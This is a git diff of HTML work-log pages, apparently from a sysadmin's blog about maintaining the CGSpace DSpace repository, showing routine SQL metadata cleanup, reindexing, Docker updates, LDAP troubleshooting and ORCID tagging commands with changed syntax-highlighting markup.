<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT(text_value) AS &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (251)) to /tmp/2021-08-11-journals.csv WITH CSV;
</span></span><span style="display:flex;"><span>COPY 3245
</span></span></code></pre></div><ul>
<li>I started looking at reconciling them with reconcile-csv in OpenRefine, but ouch, there are 1,600 journal titles that don&rsquo;t match, so I&rsquo;d have to go check many of them manually before selecting a match or fixing them&hellip;
<ul>
<li>I think it&rsquo;s better if I try to write a Python script to fetch the ISSNs for each journal article and update them that way</li>
@ -421,10 +421,10 @@ COPY 3245
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/72600
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/35730
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/76451
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/72600
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/35730
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/114644 --child<span style="color:#f92672">=</span>10568/76451
</span></span></code></pre></div><ul>
<li>I made a minor fix to OpenRXV to prefix all image names with <code>docker.io</code> so it works with less changes on podman
<ul>
<li>Docker assumes the <code>docker.io</code> registry by default, but we should be explicit</li>
@ -446,40 +446,40 @@ $ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10
</li>
<li>Lower case all AGROVOC metadata, as I had noticed a few in sentence case:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 484
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ &#39;[[:upper:]]&#39;;
</span></span><span style="display:flex;"><span>UPDATE 484
</span></span></code></pre></div><ul>
<li>Also update some DOIs using the <code>dx.doi.org</code> format, just to keep things uniform:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE 469
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 469
</span></span></code></pre></div><ul>
<li>Then start a full Discovery re-indexing to update the Feed the Future community item counts that have been stuck at 0 since we moved the three projects to be a subcommunity a few days ago:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 322m16.917s
user 226m43.121s
sys 3m17.469s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 322m16.917s
</span></span><span style="display:flex;"><span>user 226m43.121s
</span></span><span style="display:flex;"><span>sys 3m17.469s
</span></span></code></pre></div><ul>
<li>I learned how to use the OpenRXV API, which is just a thin wrapper around Elasticsearch:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39;</span> <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span> -H &#39;Content-Type: application/json&#39; \
-d &#39;{
&#34;size&#34;: 10,
&#34;query&#34;: {
&#34;bool&#34;: {
&#34;filter&#34;: {
&#34;term&#34;: {
&#34;repo.keyword&#34;: &#34;CGSpace&#34;
}
}
}
}
}&#39;
$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ==&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search?scroll=1d&#39;</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> -H &#39;Content-Type: application/json&#39; \
</span></span><span style="display:flex;"><span> -d &#39;{
</span></span><span style="display:flex;"><span> &#34;size&#34;: 10,
</span></span><span style="display:flex;"><span> &#34;query&#34;: {
</span></span><span style="display:flex;"><span> &#34;bool&#34;: {
</span></span><span style="display:flex;"><span> &#34;filter&#34;: {
</span></span><span style="display:flex;"><span> &#34;term&#34;: {
</span></span><span style="display:flex;"><span> &#34;repo.keyword&#34;: &#34;CGSpace&#34;
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}&#39;
</span></span><span style="display:flex;"><span>$ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explorer/api/search/scroll/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAASekWMTRwZ3lEMkVRYUtKZjgyMno4dV9CUQ==&#39;</span>
</span></span></code></pre></div><ul>
<li>This uses the Elasticsearch scroll ID to page through results
<ul>
<li>The second query doesn&rsquo;t need the request body because it is saved for 1 day as part of the first request</li>
@ -525,46 +525,46 @@ $ curl -X POST <span style="color:#e6db74">&#39;https://cgspace.cgiar.org/explor
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-08-25-combined-orcids.txt
$ wc -l /tmp/2021-08-25-combined-orcids.txt
1331
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/bioversity-orcids.txt | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-08-25-combined-orcids.txt
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-08-25-combined-orcids.txt
</span></span><span style="display:flex;"><span>1331
</span></span></code></pre></div><ul>
<li>After I combined them and removed duplicates, I resolved all the names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-08-25-combined-orcids.txt -o /tmp/2021-08-25-combined-orcids-names.txt
</span></span></code></pre></div><ul>
<li>Tag existing items from the Alliance&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code> (181 new metadata fields added):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-08-25-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Chege, Christine G. Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Chege, Christine Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Kiria, C.&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
&#34;Kinyua, Ivy&#34;,&#34;Ivy Kinyua :0000-0002-1978-8833&#34;
&#34;Rahn, E.&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
&#34;Rahn, Eric&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
&#34;Jager M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Jager, M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Jager, Matthias&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
&#34;Waswa, Boaz&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
&#34;Waswa, Boaz S.&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
&#34;Rivera, Tatiana&#34;,&#34;Tatiana Rivera: 0000-0003-4876-5873&#34;
&#34;Andrade, Robert&#34;,&#34;Robert Andrade: 0000-0002-5764-3854&#34;
&#34;Ceccarelli, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
&#34;Ceccarellia, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
&#34;Nyawira, Sylvia&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Nyawira, Sylvia S.&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Nyawira, Sylvia Sarah&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
&#34;Groot, J.C.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, J.C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, Jeroen C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Groot, Jeroen CJ&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
&#34;Abera, W.&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Kanyenga Lubobo, Antoine&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
&#34;Lubobo Antoine, Kanyenga&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-08-29">2021-08-29</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-08-25-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Chege, Christine G. Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Chege, Christine Kiria&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Kiria, C.&#34;,&#34;Christine G.Kiria Chege: 0000-0001-8360-0279&#34;
</span></span><span style="display:flex;"><span>&#34;Kinyua, Ivy&#34;,&#34;Ivy Kinyua :0000-0002-1978-8833&#34;
</span></span><span style="display:flex;"><span>&#34;Rahn, E.&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
</span></span><span style="display:flex;"><span>&#34;Rahn, Eric&#34;,&#34;Eric Rahn: 0000-0001-6280-7430&#34;
</span></span><span style="display:flex;"><span>&#34;Jager M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Jager, M.&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Jager, Matthias&#34;,&#34;Matthias Jager: 0000-0003-1059-3949&#34;
</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
</span></span><span style="display:flex;"><span>&#34;Waswa, Boaz S.&#34;,&#34;Boaz Waswa: 0000-0002-0066-0215&#34;
</span></span><span style="display:flex;"><span>&#34;Rivera, Tatiana&#34;,&#34;Tatiana Rivera: 0000-0003-4876-5873&#34;
</span></span><span style="display:flex;"><span>&#34;Andrade, Robert&#34;,&#34;Robert Andrade: 0000-0002-5764-3854&#34;
</span></span><span style="display:flex;"><span>&#34;Ceccarelli, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
</span></span><span style="display:flex;"><span>&#34;Ceccarellia, Viviana&#34;,&#34;Viviana Ceccarelli: 0000-0003-2160-9483&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia S.&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Nyawira, Sylvia Sarah&#34;,&#34;Sylvia Sarah Nyawira: 0000-0003-4913-1389&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, J.C.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, J.C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen C.J.&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Groot, Jeroen CJ&#34;,&#34;Groot, J.C.J.: 0000-0001-6516-5170&#34;
</span></span><span style="display:flex;"><span>&#34;Abera, W.&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
</span></span><span style="display:flex;"><span>&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
</span></span><span style="display:flex;"><span>&#34;Kanyenga Lubobo, Antoine&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
</span></span><span style="display:flex;"><span>&#34;Lubobo Antoine, Kanyenga&#34;,&#34;Antoine Lubobo Kanyenga: 0000-0003-0806-9304&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-08-25-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-08-29">2021-08-29</h2>
<ul>
<li>Run a full harvest on AReS</li>
<li>Also do more work the past few days on OpenRXV

View File

@ -48,7 +48,7 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -154,9 +154,9 @@ The syntax Moayad showed me last month doesn&rsquo;t seem to honor the search qu
<ul>
<li>Update Docker images on AReS server (linode20) and rebuild OpenRXV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><ul>
<li>Then run system updates and reboot the server
<ul>
<li>After the system came back up I started a fresh re-harvesting</li>
@ -201,8 +201,8 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ vipsthumbnail ARRTB2020ST.pdf -s x600 -o <span style="color:#e6db74">&#39;%s.jpg[Q=85,optimize_coding,strip]&#39;</span>
</span></span></code></pre></div><ul>
<li>Looking at the PDF&rsquo;s metadata I see:
<ul>
<li>Producer: iLovePDF</li>
@ -236,11 +236,11 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-09-15-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Kotchofa, Pacem&#34;,&#34;Pacem Kotchofa: 0000-0002-1640-8807&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-09-15-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Kotchofa, Pacem&#34;,&#34;Pacem Kotchofa: 0000-0002-1640-8807&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>Meeting with Leroy Mwanzia and some other Alliance people about depositing to CGSpace via API
<ul>
<li>I gave them some technical information about the CGSpace API and links to the controlled vocabularies and metadata registries we are using</li>
@ -273,42 +273,42 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-09-15-add-orcids.csv -db dspace -u
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
63
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>63
</span></span></code></pre></div><ul>
<li>Load on the server is under 1.0, and there are only about 1,000 XMLUI sessions, which seems to be normal for this time of day according to Munin</li>
<li>But the DSpace log file shows tons of database issues:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-17
14779
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-17
</span></span><span style="display:flex;"><span>14779
</span></span></code></pre></div><ul>
<li>The earliest one I see is around midnight (now is 2PM):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-09-17 00:01:49,572 WARN org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: null
</span></span><span style="display:flex;"><span>2021-09-17 00:01:49,572 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
</span></span></code></pre></div><ul>
<li>But I was definitely logged into the site this morning so there were no issues then&hellip;</li>
<li>It seems that a few errors are normal, but there&rsquo;s obviously something wrong today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-*
dspace.log.2021-09-01:116
dspace.log.2021-09-02:163
dspace.log.2021-09-03:77
dspace.log.2021-09-04:13
dspace.log.2021-09-05:310
dspace.log.2021-09-06:0
dspace.log.2021-09-07:29
dspace.log.2021-09-08:86
dspace.log.2021-09-09:24
dspace.log.2021-09-10:26
dspace.log.2021-09-11:12
dspace.log.2021-09-12:5
dspace.log.2021-09-13:10
dspace.log.2021-09-14:102
dspace.log.2021-09-15:542
dspace.log.2021-09-16:368
dspace.log.2021-09-17:15235
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#34;Timeout waiting for idle object&#34;</span> dspace.log.2021-09-*
</span></span><span style="display:flex;"><span>dspace.log.2021-09-01:116
</span></span><span style="display:flex;"><span>dspace.log.2021-09-02:163
</span></span><span style="display:flex;"><span>dspace.log.2021-09-03:77
</span></span><span style="display:flex;"><span>dspace.log.2021-09-04:13
</span></span><span style="display:flex;"><span>dspace.log.2021-09-05:310
</span></span><span style="display:flex;"><span>dspace.log.2021-09-06:0
</span></span><span style="display:flex;"><span>dspace.log.2021-09-07:29
</span></span><span style="display:flex;"><span>dspace.log.2021-09-08:86
</span></span><span style="display:flex;"><span>dspace.log.2021-09-09:24
</span></span><span style="display:flex;"><span>dspace.log.2021-09-10:26
</span></span><span style="display:flex;"><span>dspace.log.2021-09-11:12
</span></span><span style="display:flex;"><span>dspace.log.2021-09-12:5
</span></span><span style="display:flex;"><span>dspace.log.2021-09-13:10
</span></span><span style="display:flex;"><span>dspace.log.2021-09-14:102
</span></span><span style="display:flex;"><span>dspace.log.2021-09-15:542
</span></span><span style="display:flex;"><span>dspace.log.2021-09-16:368
</span></span><span style="display:flex;"><span>dspace.log.2021-09-17:15235
</span></span></code></pre></div><ul>
<li>I restarted the server and DSpace came up fine&hellip; so it must have been some kind of fluke</li>
<li>Continue working on cleaning up and annotating the metadata registry on CGSpace
<ul>
@ -338,9 +338,9 @@ dspace.log.2021-09-17:15235
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
</code></pre></div><h2 id="2021-09-20">2021-09-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span><span style="display:flex;"><span>$ docker-compose build
</span></span></code></pre></div><h2 id="2021-09-20">2021-09-20</h2>
<ul>
<li>I synchronized the production CGSpace PostreSQL, Solr, and Assetstore data with DSpace Test</li>
<li>Over the weekend a few users reported that they could not log into CGSpace
@ -349,10 +349,10 @@ $ docker-compose build
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap-account@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=someaccountnametocheck)&#34;</span>
Enter LDAP Password:
ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap-account@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=someaccountnametocheck)&#34;</span>
</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</span></span></code></pre></div><ul>
<li>I sent a message to CGNET to ask about the server settings and see if our IP is still whitelisted
<ul>
<li>It turns out that CGNET created a new Active Directory server (AZCGNEROOT3.cgiarad.org) and decomissioned the old one last week</li>
@ -361,8 +361,8 @@ ldap_sasl_bind(SIMPLE): Can&#39;t contact LDAP server (-1)
</li>
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</code></pre></div><ul>
